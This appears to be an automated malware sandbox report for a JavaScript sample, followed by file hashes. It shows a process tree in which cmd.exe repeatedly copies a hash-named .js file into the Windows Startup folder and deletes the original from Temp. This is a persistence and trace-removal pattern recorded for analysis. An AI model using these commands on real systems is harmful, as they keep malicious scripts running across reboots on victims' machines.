C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:3684
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:2720
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:3184
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:3304
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:2072
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:32
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:4556
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:3756
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:4568
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:1624
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:3692
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:4812
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:1612
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:752
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:5088
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:1708
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:1304
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:1500
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:5012
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:4976
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\6d3e27b1ccda7e6cd80c767aa1facaa62f06f34a2aa50873e79a26d5fe9e2be1.js"4⤵PID:2776
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
355B
MD5daa58b938ebe73e880b2cdd8704c6301
SHA1857c5eaf94dfeb56ba44ac70685c6787a846549c
SHA25650bae474c92c50383c3e65183eed42e3c05d134b0baf0f5cf6f8095f362f5ee6
SHA51253d127cf5afe697a77b9ff1658673295be80fbbcc24e8fa5b28d39ce7dd158ddfe1d7e756f189280fb965881a6ff1764ddb0e74325eb24574b1cb466039e999e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82